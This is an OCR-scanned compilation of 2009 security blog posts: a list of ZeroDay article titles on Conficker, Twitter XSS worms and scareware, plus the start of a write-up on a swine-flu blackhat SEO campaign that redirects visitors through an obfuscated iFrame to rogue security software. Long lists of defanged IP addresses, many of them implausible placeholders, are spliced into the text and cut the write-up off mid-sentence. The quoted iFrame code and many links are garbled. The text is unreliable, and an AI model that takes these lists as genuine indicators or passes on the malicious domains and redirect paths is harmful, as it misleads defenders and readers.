[6]November, [7]October, [8]September, [9]August and [10]July, as well as subscribe to my 
[11]personal RSS feed or [12]Zero Day’s main feed. 


Notable articles include: [13]Google’s CAPTCHA experiment and the human factor; [14]Con- 
ficker’s estimated economic cost? $9.1 billion and [15]Twitter hit by multiple variants of XSS 
worm. 


01. [16]Conficker worm’s copycat Neeris spreading over IM 

02. [17]Paul McCartney's official site serving malware 

03. [18]Fake "Conficker Infection Alert" spam campaign circulating 

04. [19] Twitter hit by multiple variants of XSS worm 

05. [20]Scareware pops-up at FoxNews 

06. [21]Waledac botnet spamming fake SMS spying tool 

07. [22]Twitter worm author gets a job at exqSoft Solutions 

08. [23]Google’s CAPTCHA experiment and the human factor 

09. [24]Hackers hijack DNS records of high profile New Zealand sites 

10. [25]New ransomware locks PCs, demands premium SMS for removal 
11. [26]Conficker’s estimated economic cost? $9.1 billion 

12. [27]Swine flu email scams circulating 

13. [28]Online broker CommSec criticised for weak passwords, lack of SSL 
14, [29]Survey: 37 % of employees would become insiders given the right incentive 
15. [30]French hacker gains access to Twitter’s admin panel 


. http://blogs.zdnet.com/securit 
. http: //ddanchev.blogspot .com/2009/03/summarizing-zero-days-posts-for-march. htm 
. http: //ddanchev.blogspot.com/2009/03/summarizing-zero-days-posts-for.htm 


ttp://ddanchev. blogspot .com/2009/02/summarizing-zero-days-posts-for- january. htm 


. http: //ddanchev.blogspot.com/2009/01/summarizing-zero-days-posts-for.htm 
. http: //ddanchev. blogspot .com/2008/12/summarizing-zero-days-posts-for .htm 
. http://ddanchev. blogspot .com/2008/11/summarizing-zero-days-posts-for-october.htm 


ttp://ddanchev.blogspot.com/2008/10/summarizing-zero-days-posts-for.htm 
ttp://ddanchev .blogspot.com/2008/09/summarizing-zero-days-posts-for-august .htm 


ttp://ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 


ttp://updates.zdnet.com/tags/danchotdanchev.htm1?t=0&s=0&0=1&mode=rss 
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16. http://blogs.zdnet .com/security/?p=309 
17. http://blogs.zdnet .com/security/?p=3098 


18. http://blogs.zdnet .com/security/?p=310 
19. http://blogs.zdnet .com/security/?p=312 


20. http://blogs.zdnet .com/security/?p=3140 
21. http://blogs.zdnet.com/security/?p=3162 


22. http://blogs.zdnet.com/security/?p=3170 
23. http://blogs.zdnet.com/security/?p=3178 
24. http://blogs.zdnet.com/security/?p=318 


. http://blogs.zdnet.com/security/?p=319 
26. http://blogs.zdnet.com/security/?p=320 
. http://blogs.zdnet.com/security/?p=323 


2217 


hxxp://117.241.99.24 
hxxp://117.212.192.178 
hxxp://112.196.167.42 
hxxp://112.196.167.58 
hxxp://117.252.66.77 
hxxp://45.67.228.196 
hxxp://46.28.69.81 
hxxp://46.28.69.53 
hxxp://5.61.34.63 
hxxp://5.61.45.151 
hxxp://37.1.223.182 
hxxp://188.116.23.111 
hxxp://95.217.4.85 
hxxp://217.23.1.184 
hxxp://96.95.54.21 
hxxp://69.145.82.234 
hxxp://5.61.34.245 
hxxp://37.1.221.52 
hxxp://37.252.9.224 
hxxp://194.5.249.136 
hxxp://185.99.2.54 
hxxp://185.99.2.176 
hxxp://194.5.249.31 
hxxp://195.123.241.157 
hxxp://45.155.173.196 
hxxp://51.89.177.18 
hxxp://195.123.241.182 
hxxp://185.244.39.65 
hxxp://195.123.241.183 
hxxp://185.234.72.147 
hxxp://51.89.177.5 
hxxp://23.239.84.132 
hxxp://194.5.249.126 
hxxp://185.99.2.161 
hxxp://51.89.177.4 


22143 


hxxp://23.239.84.136 
hxxp://51.89.177.16 
hxxp://194.5.249.171 
hxxp://185.14.31.143 
hxxp://195.123.241.13 
hxxp://134.255.235.88 
hxxp://194.5.249.156 
hxxp://195.123.241.55 
hxxp://138.91.73.189 
hxxp://37.252.4.97 
hxxp://37.252.5.157 
hxxp://37.252.5.139 
hxxp://37.252.5.156 
hxxp://37.72.168.242 
hxxp://195.123.237.91 
hxxp://91.235.129.64 
hxxp://194.87.232.53 
hxxp://185.17.123.63 
hxxp://45.138.158.35 
hxxp://185.242.85.194 
hxxp://195.123.237.153 
hxxp://185.142.99.8 
hxxp://185.68.93.33 
hxxp://82.146.54.254 
hxxp://195.123.217.27 
hxxp://45.89.127.27 
hxxp://185.99.2.196 
hxxp://195.123.241.52 
hxxp://45.89.127.38 
hxxp://195.123.241.51 
hxxp://185.164.32.161 
hxxp://164.68.116.248 
hxxp://5.34.178.247 
hxxp://45.89.127.91 


hxxp://194.5.249.196 
22144 


hxxp://185.164.32.135 
hxxp://5.34.178.59 
hxxp://131.153.22.148 
hxxp://45.89.127.92 
hxxp://194.5.249.195 
hxxp://185.164.32.118 
hxxp://167.86.126.27 


hxxp://195.123.242.141 


hxxp://131.153.22.145 
hxxp://45.89.127.118 
hxxp://23.92.93.227 
hxxp://194.5.249.217 
hxxp://185.14.31.164 
hxxp://185.99.2.123 
hxxp://5.182.211.47 
hxxp://45.89.127.119 
hxxp://23.92.93.232 
hxxp://194.5.249.216 
hxxp://85.143.223.16 
hxxp://194.156.98.215 
hxxp://95.211.38.161 
hxxp://5.17.161.235 
hxxp://68.224.217.72 
hxxp://64.227.113.155 
hxxp://188.225.33.51 
hxxp://199.116.81.194 
hxxp://1.1.1.1 
hxxp://195.123.213.19 


hxxp://173.232.146.118 


hxxp://52.237.163.166 
hxxp://3.21.2.2 
hxxp://3.88.67.132 
hxxp://54.185.138.96 
hxxp://3.95.231.52 
hxxp://136.243.42.38 
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hxxp://78.46.78.74 
hxxp://195.91.226.161 
hxxp://11.22.33.44 
hxxp://96.9.225.147 
hxxp://96.9.225.146 
hxxp://185.217.117.127 
hxxp://54.236.253.121 
hxxp://3.135.193.147 
hxxp://95.26.211.228 
hxxp://95.211.95.232 
hxxp://13.58.213.252 
hxxp://3.81.126.82 
hxxp://54.213.49.29 
hxxp://3.235.164.215 
hxxp://3.238.77.5 
hxxp://45.89.127.182 
hxxp://194.5.249.242 
hxxp://195.123.241.146 
hxxp://195.123.241.147 
hxxp://184.164.137.173 
hxxp://45.89.127.178 
hxxp://194.5.249.241 
hxxp://195.123.241.145 
hxxp://195.123.241.149 
hxxp://184.164.137.172 
hxxp://52.34.17.37 
hxxp://18.212.74.215 
hxxp://3.128.197.68 
hxxp://3.238.75.236 
hxxp://54.83.253.135 
hxxp://18.191.38.26 
hxxp://195.123.242.37 
hxxp://54.91.36.142 
hxxp://54.245.74.151 
hxxp://3.138.117.231 
22146 


hxxp://51.89.177.3 
hxxp://194.5.249.39 
hxxp://5.34.181.32 
hxxp://195.123.241.243 
hxxp://66.85.156.69 
hxxp://185.183.96.51 
hxxp://45.89.127.214 
hxxp://167.86.127.125 
hxxp://66.85.156.68 
hxxp://185.117.73.54 
hxxp://45.89.127.224 
hxxp://194.5.249.128 
hxxp://184.164.146.112 
hxxp://185.198.57.75 
hxxp://45.89.127.222 
hxxp://51.89.177.1 
hxxp://195.123.241.85 
hxxp://184.164.146.113 
hxxp://185.183.96.11 
hxxp://162.244.82.246 
hxxp://217.12.219.245 
hxxp://52.13.154.32 
hxxp://34.238.84.181 
hxxp://3.137.174.178 
hxxp://89.32.41.191 
hxxp://194.5.249.46 
hxxp://173.231.63.82 
hxxp://173.231.63.98 
hxxp://173.231.59.124 
hxxp://172.83.43.136 
hxxp://45.152.182.147 
hxxp://193.148.18.68 
hxxp://172.98.93.227 
hxxp://66.115.149.227 
hxxp://193.148.18.35 


22147 


hxxp://45.152.182.131 
hxxp://45.87.214.214 
hxxp://89.187.171.243 
hxxp://193.148.18.86 
hxxp://84.17.63.12 
hxxp://89.187.175.137 
hxxp://45.87.214.198 
hxxp://54.212.116.99 
hxxp://5.181.156.226 
hxxp://46.28.69.153 
hxxp://74.222.14.27 
hxxp://195.123.222.49 
hxxp://51.195.192.115 
hxxp://54.198.212.211 
hxxp://3.135.216.86 
hxxp://54.212.16.8 
hxxp://5.181.156.238 
hxxp://95.153.31.13 
hxxp://194.5.249.113 
hxxp://5.182.211.218 
hxxp://195.123.242.36 
hxxp://89.32.41.152 
hxxp://185.163.47.215 
hxxp://96.9.252.152 
hxxp://95.153.31.163 
hxxp://185.234.72.93 
hxxp://194.5.249.14 
hxxp://195.123.242.132 
hxxp://195.123.242.135 
hxxp://5.181.156.211 
hxxp://96.9.255.223 
hxxp://95.153.31.169 
hxxp://194.5.249.168 
hxxp://66.85.183.5 
hxxp://185.163.47.157 
22148 


hxxp://3.84.251.164 
hxxp://3.82.197.66 
hxxp://3.12.41.157 
hxxp://46.17.98.193 
hxxp://3.86.163.159 
hxxp://3.91.47.199 
hxxp://3.139.97.6 
hxxp://18.236.63.179 
hxxp://52.37.88.45 
hxxp://195.123.243.19 
hxxp://34.239.246.132 
hxxp://54.196.129.197 
hxxp://1.2.3.4 
hxxp://5.6.7.8 
hxxp://51.62.71.83 
hxxp://2.3.4.5 
hxxp://21.31.41.51 
hxxp://14.25.36.47 
hxxp://41.24.53.64 
hxxp://188.138.1.53 
hxxp://12.34.45.67 
hxxp://195.1.15.68 
hxxp://147.126.54.43 
hxxp://85.25.235.173 
hxxp://6.2.2.1 
hxxp://6.2.2.2 
hxxp://6.2.2.3 
hxxp://4.3.2.1 
hxxp://55.55.55.55 
hxxp://123.45.67.89 
hxxp://85.25.217.69 
hxxp://2.2.2.2 
hxxp://15.4.4.18 
hxxp://45.142.215.227 
hxxp://185.117.73.55 


22149 


hxxp://195.123.239.127 
hxxp://146.185.219.74 
hxxp://45.11.183.194 
hxxp://73.6.225.41 
hxxp://1.31.8.1 
hxxp://173.239.199.96 
hxxp://162.33.177.123 
hxxp://162.33.177.152 
hxxp://162.33.178.131 
hxxp://162.33.179.12 
hxxp://162.33.179.96 
hxxp://31.13.195.145 
hxxp://6.15.2.41 
hxxp://4.4.8.137 
hxxp://1.3.38.92 
hxxp://95.1.31.88 
hxxp://1.3.153.47 
hxxp://1.1.1.47 
hxxp://4.1.1.64 
hxxp://162.33.177.69 
hxxp://212.8.251.19 
hxxp://19.4.3.38 
hxxp://3.7.1.28 
hxxp://3.1.64.11 
hxxp://45.148.123.47 
hxxp://32.3.198.49 
hxxp://32.2.188.47 
hxxp://162.33.177.196 
hxxp://1.35.133.1 
hxxp://1.3.153.53 
hxxp://2.8.181.13 
hxxp://94.31.96.65 
hxxp://162.33.178.33 
hxxp://2.8.3.96 
hxxp://5.2.5.1 

22150 


hxxp://21.6.39.7 
hxxp://142.187.198.81 
hxxp://45.15.131.126 
hxxp://64.114.197.215 
hxxp://5.7.4.39 
hxxp://66.244.231.66 
hxxp://194.147.115.132 
hxxp://164.51.5.2 
hxxp://69.58.122.58 
hxxp://142.11.237.178 
hxxp://185.99.132.121 
hxxp://5.4.1.149 
hxxp://1.2.1.24 
hxxp://5.5.1.38 
hxxp://185.163.45.95 
hxxp://185.183.96.244 
hxxp://185.99.133.67 
hxxp://31.13.195.125 
hxxp://31.13.195.87 
hxxp://5.39.63.98 
hxxp://68.33.66.155 
hxxp://162.33.177.194 
hxxp://3.1.2.4 
hxxp://1.18.15.1 
hxxp://9.1.4.44 
hxxp://5.1.8.12 
hxxp://162.33.179.52 
hxxp://1.3.38.34 
hxxp://185.158.251.49 
hxxp://45.61.136.145 
hxxp://3.1.1.35 
hxxp://1.67.12.19 
hxxp://2.1.1.1 
hxxp://1.1.11.1 
hxxp://3.4.4.132 


22151 


hxxp://32.12.5.2 
hxxp://8.5.2.199 
hxxp://45.138.51.223 
hxxp://3.1.21.215 
hxxp://2.11.52.58 
hxxp://17.7.2.1 
hxxp://162.33.177.154 
hxxp://67.253.155.114 
hxxp://9.3.15.26 
hxxp://19.4.3.166 
hxxp://2.2.32.1 
hxxp://76.88.177.39 
hxxp://162.33.179.217 
hxxp://1.2.2.3 
hxxp://6.1.4.2 
hxxp://2.6.3.1 
hxxp://216.237.233.243 
hxxp://1.5.6.19 
hxxp://21.9.1.2 
hxxp://3.4.8.3 
hxxp://21.9.1.3 
hxxp://162.33.179.88 
hxxp://12.11.3.17 
hxxp://98.153.137.2 
hxxp://7.1.4.2 
hxxp://7.2.2.89 
hxxp://24.153.193.11 
hxxp://216.165.95.169 
hxxp://7.3.1.43 
hxxp://7.3.2.45 
hxxp://7.3.4.82 
hxxp://146.57.146.237 
hxxp://7.7.1.16 
hxxp://141.126.226.19 
hxxp://167.232.252.15 
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28. http://blogs.zdnet .com/security/?p=325 


ttp://blogs.zdnet .com/security/?p=3278 


30. http: //blogs.zdnet .com/security/?p=3292 


5.5.2 Dissecting a Swine Flu Black SEO Campaign (2009-05-06 16:05) 


maine swine flu - [ Diese Seite iibersetzen ] 
Tell me about maine flu swine!!! Hot news about maine swine flu. 
2qnews.07x_net/maine-swine-flu_html - 14k - lm Cache - Ahnliche Seiten 


swine flu systoms - [ Diese Seite ibersetzen ] 
Tell me about systoms flu swine!!! Hot news about swine flu systoms. 
2qnews.07x.net/swine-flu-systoms-html - 14k - lm Cache - Ahnliche Seiten 


swine flu columbus - [ Diese Seite tibersetzen ] 
Tell me about flu swine columbus!!! Hot news about swine flu columbus. 
2qnews.07x.net/swine-flu-columbus-html - 15k - |m Cache - Ahnliche Seiten 


cleburne swine flu - [ Diese Seite iibersetzen ] 
Tell me about swine flu cleburnel!!! Hot news about cleburne swine flu. 
2qnews.07x_net/cleburne-swine-flu_html - 14k - lm Cache - Ahnliche Seiten 


swine flu systems - [ Diese Seite ibersetzen ] 
Tell me about flu systems swine!!! Hot news about swine flu systems. 
2qnews.07x.net/swine-flu-systems_html - 14k - lm Cache - Ahnliche Seiten 


swine flu oklahoma - [ Diese Seite tibersetzen ] 
1 May 2009 ... Tell me about swine flu oklahomal!! Hot news about swine flu oklahoma. 
2qnews.07x_net/swine-flu-oklahoma_html - 14k - lm Cache - Ahnliche Seiten 


swine flu in virginia - [ Diese Seite tibersetzen ] 
Tell me about virginia in swine flu!!! Hot news about swine flu in virginia. 
2qnews.07x.net/swine-flu-in-virginia_html - 15k - Im Cache - Ahnliche Seiten 


chicago swine flu - [ Diese Seite iibersetzen ] 
Tell me about swine flu chicago!!! Hot news about chicago swine flu. 
2qnews.07x.net/chicago-swine-flu.html - 14k - Im Cache - Ahnliche Seiten 


swine flu orange county - [ Diese Seite tbersetzen ] 
Tell me about county swine orange flu!!! Hot news about swine flu orange county. 
2qnews.07x.net/swine-flu-orange-county-html - 15k - Im Cache - Ahnliche Seiten 


swine flu in Ca - [ Diese Seite tibersetzen ] 
Tell me about in ca swine flu!!! Hot news about swine flu in ca. 
2qnews.07x.net/swine-flu-in-ca_html - 14k - lm Cache - Ahnliche Seiten 


Remember the Ukrainian group of cyber criminals that was responsible for last week’s [1]mas- 
sive blackhat SEO campaign that was serving scareware, followed by the [2]timely hijacking 
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hxxp://4.12.5.8 
hxxp://1.3.3.41 
hxxp://65.182.237.56 
hxxp://2.9.5.3 
hxxp://3.3.2.198 
hxxp://198.231.16.16 
hxxp://7.4.5.122 
hxxp://4.17.1.19 
hxxp://149.28.98.49 
hxxp://98.41.132.238 
hxxp://68.142.59.111 
hxxp://5.4.3.151 
hxxp://24.175.94.173 
hxxp://7.2.2.2 
hxxp://4.13.3.38 
hxxp://22.4.2.242 
hxxp://1.21.1.38 
hxxp://72.168.176.36 
hxxp://86.98.26.196 
hxxp://5.181.156.16 
hxxp://1.1.8.23 
hxxp://1.1.9.33 
hxxp://1.3.153.55 
hxxp://22.15.2.22 
hxxp://162.33.178.179 
hxxp://98.242.233.183 
hxxp://98.193.38.212 
hxxp://24.177.57.124 
hxxp://184.188.122.164 
hxxp://162.33.177.158 
hxxp://162.33.178.237 
hxxp://2.5.1.15 
hxxp://4.8.1.7 
hxxp://162.33.177.25 
hxxp://162.33.178.119 
22153 


hxxp://162.33.178.121 
hxxp://162.33.178.246 
hxxp://162.33.178.49 
hxxp://162.33.179.158 
hxxp://45.11.183.129 
hxxp://87.121.52.177 
hxxp://87.121.52.61 
hxxp://64.217.158.234 
hxxp://96.2.3.28 
hxxp://47.189.63.47 
hxxp://162.33.177.178 
hxxp://162.33.179.2 
hxxp://67.253.34.174 
hxxp://4.4.9.142 
hxxp://1.3.32.136 
hxxp://1.2.6.7 
hxxp://1.3.38.35 
hxxp://8.5.1.1 
hxxp://73.245.195.88 
hxxp://24.16.143.39 
hxxp://87.121.52.247 
hxxp://98.149.34.69 
hxxp://7.1.5.2 
hxxp://1.3.85.73 
hxxp://162.33.178.97 
hxxp://162.33.179.144 
hxxp://64.237.67.18 
hxxp://4.1.2.73 
hxxp://162.33.179.237 
hxxp://172.58.84.56 
hxxp://96.39.18.58 
hxxp://185.158.251.73 
hxxp://71.8.41.154 
hxxp://3.8.3.29 
hxxp://3.1.1.3 
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hxxp://1.3.35.45 
hxxp://7.17.13.75 
hxxp://2.8.221.11 
hxxp://51.52.28.218 
hxxp://193.169.86.84 
hxxp://4.6.11.191 
hxxp://3.5.171.27 
hxxp://2.5.171.27 
hxxp://5.6.7.43 
hxxp://1.1.2.4 
hxxp://8.8.34.31 
hxxp://12.18.34.21 
hxxp://4.1.1.14 
hxxp://6.8.9.41 
hxxp://71.95.179.165 
hxxp://6.6.26.37 
hxxp://6.6.27.39 
hxxp://3.9.1.245 
hxxp://1.4.3.1 
hxxp://5.7.21.28 
hxxp://1.3.28.15 
hxxp://3.9.14.1 
hxxp://1.8.4.1 
hxxp://1.9.7.2 
hxxp://31.13.195.129 
hxxp://21.6.4.42 
hxxp://2.8.231.11 
hxxp://11.21.2.2 
hxxp://1.67.12.24 
hxxp://9.13.18.133 
hxxp://4.2.3.1 
hxxp://27.1.36.23 
hxxp://3.9.2.1 
hxxp://94.249.131.6 
hxxp://1.3.35.1 


22155 


hxxp://2.3.2.48 
hxxp://2.3.2.26 
hxxp://87.121.52.173 
hxxp://1.4.9.2 
hxxp://1.1.19.1 
hxxp://8.8.24.33 
hxxp://11.4.2.2 
hxxp://21.5.33.3 
hxxp://12.13.42.1 
hxxp://162.33.177.179 
hxxp://162.33.179.23 
hxxp://162.33.177.217 
hxxp://162.33.177.229 
hxxp://162.33.178.243 
hxxp://68.129.145.245 
hxxp://194.147.115.7 
hxxp://5.255.96.16 
hxxp://84.32.188.182 
hxxp://91.234.254.127 
hxxp://96.73.198.57 
hxxp://68.187.5.2 
hxxp://162.33.178.128 
hxxp://2.18.1.1 
hxxp://4.6.39.2 
hxxp://24.248.85.157 
hxxp://188.127.251.111 
hxxp://67.248.165.112 
hxxp://12.12.1.1 
hxxp://65.219.196.73 
hxxp://142.116.35.243 
hxxp://194.15.113.155 
hxxp://162.33.178.147 
hxxp://162.33.179.53 
hxxp://1.3.38.16 
hxxp://9.1.1.5 

22156 


hxxp://12.9.18.3 
hxxp://4.6.21.1 
hxxp://1.19.9.1 
hxxp://4.6.1.1 
hxxp://162.211.2.243 
hxxp://162.33.177.88 
hxxp://45.61.136.128 
hxxp://4.8.84.163 
hxxp://7.7.3.161 
hxxp://6.2.16.1 
hxxp://8.2.8.25 
hxxp://1.5.2.1 
hxxp://162.33.179.111 
hxxp://1.2.2.37 
hxxp://4.2.1.89 
hxxp://18.1.1.13 
hxxp://3.94.2.21 
hxxp://212.219.57.43 
hxxp://3.7.2.3 
hxxp://12.9.4.55 
hxxp://2.8.241.7 
hxxp://148.163.42.213 
hxxp://188.127.235.177 
hxxp://1.3.153.57 
hxxp://1.1.1.32 
hxxp://4.4.129.1 
hxxp://3.9.1.33 
hxxp://4.2.11.42 
hxxp://1.7.5.63 
hxxp://9.5.23.176 
hxxp://1.3.25.11 
hxxp://13.5.2.4 
hxxp://162.33.178.35 
hxxp://4.6.12.241 
hxxp://173.235.92.194 


22157 


hxxp://2.2.4.44 
hxxp://3.4.8.4 
hxxp://68.67.51.65 
hxxp://2.8.171.11 
hxxp://3.3.1.3 
hxxp://68.32.145.82 
hxxp://12.6.1.19 
hxxp://5.7.1.179 
hxxp://17.7.3.184 
hxxp://2.4.4.184 
hxxp://3.5.9.181 
hxxp://3.4.18.177 
hxxp://3.2.7.175 
hxxp://3.5.1.119 
hxxp://1.3.2.74 
hxxp://8.7.2.45 
hxxp://195.99.111.193 
hxxp://2.4.1.51 
hxxp://12.119.8.234 
hxxp://1.3.34.26 
hxxp://9.5.15.173 
hxxp://76.188.146.197 
hxxp://17.4.2.41 
hxxp://11.5.113.57 
hxxp://151.53.23.52 
hxxp://1.3.6.9 
hxxp://63.78.244.29 
hxxp://22.5.1.44 
hxxp://2.2.6.87 
hxxp://1.1.1.22 
hxxp://2.2.1.37 
hxxp://2.8.191.12 
hxxp://173.162.246.5 
hxxp://5.2.1.129 
hxxp://5.1.4.119 
22158 


hxxp://152.22.85.22 
hxxp://149.152.42.141 
hxxp://144.121.123.33 
hxxp://1.3.33.17 
hxxp://68.186.34.4 
hxxp://162.33.177.119 
hxxp://162.33.179.176 
hxxp://12.12.2.2 


hxxp://216.215.115.154 


hxxp://1.4.2.1 
hxxp://1.6.3.1 
hxxp://6.5.61.2 
hxxp://47.47.36.38 
hxxp://1.31.36.19 
hxxp://1.1.1.31 
hxxp://1.7.45.16 
hxxp://1.1.8.1 
hxxp://3.5.8.14 
hxxp://1.2.11.2 
hxxp://1.2.11.1 
hxxp://1.16.47.1 
hxxp://71.42.245.12 
hxxp://2.19.4.32 
hxxp://2.1.8.6 
hxxp://8.7.1.45 
hxxp://47.19.188.114 
hxxp://31.13.195.187 
hxxp://5.3.138.1 
hxxp://2.8.111.14 
hxxp://69.248.86.194 
hxxp://66.231.5.138 
hxxp://9.3.13.26 
hxxp://1.4.4.1 
hxxp://1.1.28.1 
hxxp://6.2.39.1 


22159 


hxxp://1.16.61.1 
hxxp://24.144.176.113 
hxxp://15.2.1.3 
hxxp://12.16.3.57 
hxxp://4.3.9.62 
hxxp://71.175.87.23 
hxxp://24.72.196.39 
hxxp://12.5.5.5 
hxxp://12.2.1.171 
hxxp://7.1.3.41 
hxxp://5.5.3.61 
hxxp://12.2.12.1 
hxxp://5.6.6.232 
hxxp://3.1.2.41 
hxxp://5.9.7.72 
hxxp://7.3.2.54 
hxxp://98.174.112.164 
hxxp://6.8.2.3 
hxxp://1.8.3.212 
hxxp://1.4.8.2 
hxxp://24.253.154.235 
hxxp://3.6.1.27 
hxxp://76.19.123.216 
hxxp://9.6.2.168 
hxxp://12.9.2.6 
hxxp://13.5.1.2 
hxxp://2.8.73.2 
hxxp://12.229.219.146 
hxxp://162.33.179.11 
hxxp://162.33.179.85 
hxxp://95.1.31.91 
hxxp://1.2.1.7 
hxxp://2.3.25.112 
hxxp://1.3.36.51 
hxxp://96.79.82.1 
22160 


hxxp://19.3.253.135 
hxxp://74.143.45.114 
hxxp://96.245.61.121 
hxxp://1.1.7.32 
hxxp://1.49.213.1 
hxxp://14.2.4.241 
hxxp://1.1.3.8 
hxxp://147.189.143.13 
hxxp://162.33.178.153 
hxxp://185.183.98.39 
hxxp://194.15.112.35 
hxxp://19.1.5.48 
hxxp://216.59.233.166 
hxxp://1.45.2.52 
hxxp://67.21.186.173 
hxxp://6.2.1.19 
hxxp://1.4.2.79 
hxxp://72.38.215.81 
hxxp://4.1.6.32 
hxxp://9.3.16.26 
hxxp://1.2.1.53 
hxxp://6.2.47.1 
hxxp://2.12.12.4 
hxxp://1.2.23.1 
hxxp://73.219.182.67 
hxxp://1.35.127.1 
hxxp://1.9.2.8 
hxxp://96.21.236.211 
hxxp://1.9.5.68 
hxxp://2.11.4.125 
hxxp://6.4.6.165 
hxxp://96.65.216.17 
hxxp://8.66.95.69 
hxxp://216.167.156.34 
hxxp://162.33.179.47 


22161 


hxxp://7.12.4.14 
hxxp://24.129.147.114 
hxxp://6.7.1.42 
hxxp://8.2.1.3 
hxxp://3.8.5.29 
hxxp://2.8.31.13 
hxxp://2.2.51.84 
hxxp://2.1.3.127 
hxxp://2.5.8.27 
hxxp://3.9.141.25 
hxxp://1.1.83.99 
hxxp://1.1.2.2 
hxxp://12.1.3.147 
hxxp://1.16.33.1 
hxxp://162.33.177.216 
hxxp://162.33.179.216 
hxxp://1.4.15.1 
hxxp://31.13.195.85 
hxxp://96.79.75.149 
hxxp://192.69.177.218 
hxxp://162.33.179.67 
hxxp://99.137.181.124 
hxxp://33.2.5.11 
hxxp://11.1.1.42 
hxxp://64.121.165.57 
hxxp://17.3.1.34 
hxxp://3.9.9.46 
hxxp://7.5.1.5 
hxxp://2.9.1.3 
hxxp://162.33.179.16 
hxxp://162.33.179.213 
hxxp://24.224.198.133 
hxxp://75.48.48.9 
hxxp://1.43.128.3 
hxxp://1.4.1.255 
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of Mickeyy worm keywords a week earlier to once again serve rogue security software? 


They are back with new blackhat SEO farms which they continue monetizing through 
[3]rogue security software. Time to dissect their latest campaign and expose their malicious 
practices. 


Once having most of their previous domains blacklisted/shut down, the group naturally 
introduced new ones, and changed the search engine optimization theme to swine flu, in 
between a variation of their previous one relying on catchy titles such as USA News; BBC 
News; CNN News as well as Hottest info!; HOT NEWS; Official Website and Official Site. 


ne.weite( “nescape ( 
*NICN7TIN EIN 729 GY TOS THN ZON 738 725 GIDDY EOS 748 748 TON IAN ZEN ZFS 738 GSN TON ESN 728 GES 748 CDN GBR CLV IZ¥ ONION TOVZEN 728 TSN AES GL C48 GDN GON GENZFS 728 G58 CAN ZFS CSN GENZ 
ER 704 GBR TOL SEL SCRIPATINGSATZLEDL ION TARSE* ) pe 


Upon visiting the site, an obfuscated iFrame statically hosted on all of the participating 
domains in the form of 2qnews.07x .net/images/menu.js redirects the user to sexerotika2009 
.ru/admin/red/en.php (74.54.176.50; Email: rebsdtis@land.ru). Are you noticing the [4]direc- 
tory structure similarities? Appreciate my rhetoric, it’s last month’s [5]blackhat SEO gang with 
a new portfolio of domains. 


2219 


hxxp://69.147.3.25 
hxxp://67.217.157.5 
hxxp://2.2.3.148 
hxxp://216.75.114.197 
hxxp://98.37.76.33 
hxxp://4.4.1.122 
hxxp://52.44.244.137 
hxxp://162.33.178.115 
hxxp://151.75.145.241 
hxxp://2.8.211.12 
hxxp://4.9.1.1 
hxxp://5.5.1.34 
hxxp://1.2.26.1 
hxxp://2.12.3.86 
hxxp://13.9.1.155 
hxxp://141.217.194.98 
hxxp://1.2.1.25 
hxxp://162.33.179.8 
hxxp://4.12.5.36 
hxxp://2.9.5.41 
hxxp://2.8.251.8 
hxxp://7.3.4.46 
hxxp://216.48.224.64 
hxxp://2.8.144.1 
hxxp://12.178.76.234 
hxxp://1.3.38.94 
hxxp://96.78.253.29 
hxxp://162.33.177.74 
hxxp://162.33.179.46 
hxxp://9.3.4.244 
hxxp://19.3.8.32 
hxxp://4.1.11.34 
hxxp://1.4.14.1 
hxxp://4.1.11.36 
hxxp://1.5.6.15 


22163 


hxxp://12.3.6.12 
hxxp://1.1.9.1 
hxxp://2.8.151.12 
hxxp://3.6.8.2 
hxxp://1.1.4.1 
hxxp://136.228.49.3 
hxxp://155.94.242.5 
hxxp://162.33.178.65 
hxxp://162.33.179.253 
hxxp://8.65.244.5 
hxxp://12.9.1.47 
hxxp://8.5.37.19 
hxxp://12.8.47.1 
hxxp://6.4.1.151 
hxxp://1.3.4.66 
hxxp://18.3.3.1 
hxxp://21.5.4.29 
hxxp://87.121.52.13 
hxxp://4.6.13.29 
hxxp://4.1.1.65 
hxxp://12.193.151.42 
hxxp://27.1.34.24 
hxxp://4.7.5.249 
hxxp://12.3.6.9 
hxxp://39.2.13.75 
hxxp://129.49.16.22 
hxxp://162.33.178.148 
hxxp://162.33.178.228 
hxxp://162.33.179.245 
hxxp://174.197.1.194 
hxxp://185.49.37.122 
hxxp://3.12.41.3 
hxxp://12.18.9.7 
hxxp://65.122.198.42 
hxxp://8.8.1.225 
22164 


hxxp://66.218.255.244 
hxxp://17.4.79.51 
hxxp://192.26.129.2 
hxxp://14.3.47.1 
hxxp://1.9.1.15 
hxxp://6.75.6.74 
hxxp://2.21.24.34 
hxxp://1.2.18.5 
hxxp://2.1.1.3 
hxxp://24.142.151.198 
hxxp://2.8.66.18 
hxxp://12.23.78.254 
hxxp://3.1.1.1 
hxxp://3.3.4.29 
hxxp://1.31.38.54 
hxxp://9.1.2.233 
hxxp://3.1.9.5 
hxxp://216.83.74.247 
hxxp://19.3.4.121 
hxxp://19.2.1.1 
hxxp://21.5.3.235 
hxxp://9.5.4.29 
hxxp://2.4.2.1 
hxxp://1.4.14.2 
hxxp://3.4.8.2 
hxxp://1.1.25.1 
hxxp://6.7.3.55 
hxxp://3.7.1.13 
hxxp://72.11.11.72 
hxxp://7.4.1.14 
hxxp://1.1.1.132 
hxxp://8.1.1.3 
hxxp://12.1.1.4 
hxxp://1.4.5.5 
hxxp://3.1.44.5 


22165 


hxxp://2.8.25.18 
hxxp://12.47.5.82 
hxxp://22.21.9.25 
hxxp://5.2.1.44 
hxxp://2.3.1.4 
hxxp://72.22.212.242 
hxxp://4.2.6.18 
hxxp://1.3.21.115 
hxxp://84.45.177.161 
hxxp://1.1.2.1 
hxxp://2.6.5.1 
hxxp://6.1.19.84 
hxxp://1.1.3.6 
hxxp://46.253.242.26 
hxxp://2.4.1.2 
hxxp://23.25.2.1 
hxxp://71.246.225.234 
hxxp://21.5.7.37 
hxxp://4.2.5.168 
hxxp://1.16.56.1 
hxxp://24.16.171.43 
hxxp://98.154.78.42 
hxxp://21.6.2.27 
hxxp://71.43.174.146 
hxxp://76.65.63.141 
hxxp://217.151.98.69 
hxxp://162.33.179.99 
hxxp://45.61.136.185 
hxxp://2.1.3.5 
hxxp://1.1.4.19 
hxxp://2.4.8.1 
hxxp://24.234.112.36 
hxxp://86.111.139.79 
hxxp://217.114.218.18 
hxxp://162.33.178.34 
22166 


hxxp://195.216.219.71 
hxxp://162.33.177.219 
hxxp://31.13.195.71 
hxxp://87.121.52.195 
hxxp://72.83.228.231 
hxxp://4.65.5.65 
